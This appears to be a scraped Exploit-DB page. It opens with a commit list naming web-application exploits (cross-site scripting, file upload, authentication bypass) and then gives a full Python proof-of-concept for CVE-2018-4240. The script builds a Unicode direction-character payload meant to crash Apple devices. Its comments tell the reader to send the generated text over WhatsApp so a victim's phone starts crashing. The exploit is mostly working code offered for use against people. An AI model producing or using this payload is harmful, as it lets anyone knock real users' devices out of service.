3e5849385e
29 changes to exploits/shellcodes Doctor Search Script 1.0.2 - Persistent Cross-Site Scripting Multilanguage Real Estate MLM Script - Persistent Cross-Site Scripting Naukri Clone Script - Persistent Cross-Site Scripting Hot Scripts Clone Script Classified - Persistent Cross-Site Scripting Facebook Clone Script 1.0.5 - Cross-Site Scripting Schools Alert Management Script 2.0.2 - Arbitrary File Upload Lawyer Search Script 1.0.2 - Cross-Site Scripting Bitcoin MLM Software 1.0.2 - Cross-Site Scripting Select Your College Script 2.0.2 - Authentication Bypass Multi religion Responsive Matrimonial 4.7.2 - Cross-Site Scripting Learning and Examination Management System - Cross-Site Scripting Alibaba Clone Script 1.0.2 - Cross-Site Scripting Groupon Clone Script 3.0.2 - Cross-Site Scripting Schools Alert Management Script 2.0.2 - Authentication Bypass
26 lines
No EOL
1,017 B
Python
Executable file
26 lines
No EOL
1,017 B
Python
Executable file
# Exploit Title: Apple MacOS 10.13.4 - Denial of Service (PoC)
|
|
# Date: 2018-09-10
|
|
# Exploit Author: Sriram (@Sri_Hxor)
|
|
# Vendor Homepage: https://support.apple.com/en-in/HT208848
|
|
# Tested on: macOS High Sierra 10.13.4, iOS 11.3, tvOS 11.3, watchOS 4.3.0
|
|
# CVE : CVE-2018-4240 (2018)
|
|
# POC : https://medium.com/@thesriram/cold-war-between-single-message-vs-mbbs-d5e004d64eaf
|
|
|
|
# Crashing Phone via RLM character.
|
|
# Steps to Reproduce,
|
|
|
|
# Run the below python script as "python apple.py", it will create a file called "dos_apple.txt"
|
|
# Copy the text from the generated apple.txt
|
|
# Paste it in WhatsApp and send it, victim gotta click and it will start crashing
|
|
|
|
end = "‮ereh-hcuot-t'nod"
|
|
dos = "‎‏"
|
|
payload = dos*1000 + end
|
|
try:
|
|
f=open("dos_apple.txt","w")
|
|
print "[+] Creating %s DOS payload for apple..." % ((len(payload)-len(end))/len(dos))
|
|
f.write(payload)
|
|
f.close()
|
|
print "[+] File created!"
|
|
except:
|
|
print "Can't create a file, check DIR permissions?" |